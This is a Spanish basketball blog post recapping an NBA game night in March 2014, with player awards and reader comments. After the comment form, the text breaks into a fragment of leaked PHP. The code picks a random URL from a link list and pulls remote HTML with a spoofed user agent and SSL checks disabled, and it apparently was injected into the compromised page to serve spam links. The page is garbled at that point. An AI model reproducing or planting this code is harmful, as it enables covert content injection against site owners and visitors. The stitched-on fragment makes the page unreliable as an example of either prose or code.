La Crónica: Indiana sigue mandando en el Este

27 de March de 2014 por Simon

Un auténtico partidazo eclipsaba ayer el resto de la jornada. Indiana Pacers, líderes del Este, recibían a los actuales campeones, Miami Heat. En juego estaba, además del golpe a la moral del rival, la cabeza del Este. El partido resultó realmente duro, con muchas interrupciones, ritmo lentísimo, cada balón se peleaba hasta la muerte. Con estos ingredientes el partido estuvo escaso de brillantez pero vibrante y muy emocionante debido a la gran cantidad de alternativas. Los Pacers empezaron más entonados pero poco a poco Miami fue cogiéndole el punto al partido. Bueno, más que Miami, Lebron, porque ayer fue el único que presento batalla. Los Heat llegaron con una ventaja de 7 puntos a los minutos finales pero dos mates seguidos de Paul George cambiaron el signo del encuentro. En los últimos 3 minutos y medio, Miami apenas fue capaz de anotar un triple y los Pacers consiguieron llegar por delante a los últimos segundos. En la última jugada el lanzamiento de Bosh no tocó aro e Indiana se llevó una victoria que les otorga  una ventaja vital para afrontar lo que queda de temporada (83-84). Aunque lejos de ellos, el equipo más cercano en la clasificación a los dos gigantes del Este son los Raptors que se recuperaron de la derrota la noche anterior en Cleveland ganando en el Garden con cierta comodidad (99-90), dejando sentenciada su clasificación para los Play Off. 

En el Oeste no fallaron los Spurs que lograron la victoria sin sudar demasiado a pesar de lo que indica el marcador. Los Nuggets maquillaron el marcador en el último cuarto y aunque por momentos estuvieron cerca de igualar a San Antonio realmente les inquietaron poco (103-108). Sí saltó la sorpresa en cambio en la visita de los Clippers a los Pelicans, que a pesar de que poco tienen que hacer esta temporada siguen compitiendo y no ponen las cosas fáciles a ningún rival. La gran noche de Crawford desde el banquillo no pudo compensar el mal partido de Chris Paul, que por poco no se quedó sin anotar, y los los locales, liderados por un inspiradísimo Anthony Morrow y el desempeño habitual de Anthony Davis, se llevaron la victoria. Crawford tuvo el tiro para ganar pero no encestó el triple que habría dado la victoria a los angelinos (96-98). Con esta victoria los Clippers, que tenían puesta la vista en el segundo puesto de Oklahoma, tienen que empezar a mirar atrás porque tienen encima a los Rockets que en próximas fechas podrían igualar su balance.

Dos de los partidos más interesantes de la jornada por la igualdad de los equipos que se enfrentaban eran la visita de los Nets a Charlotte y la de los Suns a la capital de Estados Unidos. Estos últimos sumaron su quinta victoria consecutiva ante unos Wizards que apenas fueron rivales para Dragic y compañía. Los Suns ganaban de 25 puntos mediado el tercer cuarto pero un enorme John Wall lideró un gran parcial del equipo capitalino que sin embargo solo sirvió para ahogarse en la orilla. Cuando más cerca estaban Eric Bledsoe, con un triple, finiquitó sus opciones de triunfo (99-93). Más igualado fue el partido de los Nets ante los Bobcats. Brooklyn jugó anoche su tercera prórroga consecutiva de las que han perdido las dos últimas. Charlotte, con Jefferson como estilete, supo imponer su localía en la prórroga y no dejó escapar una victoria que le coloca muy cerca en la clasificación de los Wizards. Deron Williams -espectacular final de temporada el suyo- fue el que forzó la prórroga con un lanzamiento lejano y una gran defensa sobre el último intento de Kemba Walker. En la prórroga, los Bobcats tuvieron la suerte de cara y cuando parecía que los Nets iban a tener bola para igualar el encuentro, Douglas Roberts cogió el rechace de un tapón y anotó la canasta que certificó la victoria (111-116).

Resumiendo el resto de partidos de la jornada, los Wolves barrieron a los Hawks a pesar de que Ruicky Rubio recibió 15 puntos en su labio tras un encontronazo con Mike Scotte (83-107). Por su parte, los Cavs se aprovecharon del típico apagón en el último cuarto de los Pistons para remontar un partido que tenían perdido con un protagonista sorprendente, Matheew Dellavedova, aunque el autor de la canasta sobre la bocina fue Dion Waiters, desatado desde que Irving está de baja (97-96). JR Smith anotó 9 triples pero a punto estuvieron los Knicks de dejarse remontar ante los Kings (107-99) y los Grizzlies ganaron gracias a un último cuarto en el que pasaron por encima de los Jazz (91-87).

PREMIOS

MVP: Si no lo hacíais ya, a partir de hoy todo el mundo en pie cada vez que leais en este blog el nombre de Tim Duncan. “The Eternal” (ya le pongo yo el mote) lideró una vez más a los Spurs con 29 puntos, 13 rebotes, 5 asistencias, 2 robos y 2 tapones. Los 35 puntos y 15 rebotes de Al Jefferson le puede discutir algo el título.

Rookie: A mí dadme siempre un Matthew Dellavedova para mi equipo. El australiano ayer fue el mejor de los Cavs con 21 puntos y 6 asistencias pero siempre se deja la piel en favor del equipo. Gorgui Dieng cogió 15 rebotes y anotó 15 puntos. Ya ni sorprende.

Sorpresa: Aaron Brooks volvió a cancha cuando su equipo perdía de 24 y llegó a ponerlo a escasos 4 puntos. Acabó el partido con 25 puntos, 5 rebotes, 8 asistencias y ni una sola pérdida.

Decepción: 0 de 12 en TC para Chris Paul. Seguramente ni él mismo se lo podía creer.

Esfuerzo en vano: 32 puntos, 15 rebotes, 8 asistencias, 2 robos, 2 tapones… y derrota. ¿No se cansa nunca de perder Demarcus Cousins?

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    La madre que parió a George Hill xddd

    Vaya movimiento de Turner en su última canasta, wow.

    Y lo de Stephenson, es técnica. Si era la segunda, pues expulsión, si era la primera, me parece excesivo. Lo comento porque HisRoyal lo puso en la crónica anterior.

      Citar

  2. Jose Luis dice:
    #2

    Se me olvidaba el codazo de LeBron a Hibbert en la boca, siempre entra igual, y muy pocas veces le pitan falta en ataque.

      Citar

  3. Ruxixon dice:
    #3

    Vaya crack Stephenson,está como una cabra.

      Citar

  4. Nacho dice:
    #4

    “Partidazo” hoy en Atlanta. Los Hawks vienen de caer cuatro partidos seguidos cuando parecía que enderezaban el rumbo, y los Blazers como no espabilen se quedan fuera de PO. Parece que vuelve Aldridge.
    Aunque parezca mentira uno de los dos ganará.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>